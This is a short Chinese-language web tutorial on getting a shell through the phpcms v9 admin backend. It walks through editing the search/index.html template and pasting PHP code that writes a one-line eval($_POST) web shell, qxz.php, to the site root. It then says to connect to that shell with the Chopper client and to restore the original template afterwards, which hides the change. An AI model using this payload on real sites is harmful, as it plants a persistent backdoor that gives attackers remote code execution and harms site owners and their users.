记一次phpcms v9后台拿shell过程
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:
推荐:《phpcms教程》
立即学习“PHP免费学习笔记(深入)”;
然后点击 search 这个文件夹,如下图:
然后点击修改 index.html 文件
然后把以下代码复制上去提交。
<?$fp = @fopen(“qxz.php”, ‘a’);@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);@fclose($fp);?>
提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。
提交后点击可视化一下
这样在网站的根目录就生成了你的一句话木马客户端 qxz.php
拿起菜刀链接 http://www.xxx.com/qxz.php
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
评论(0)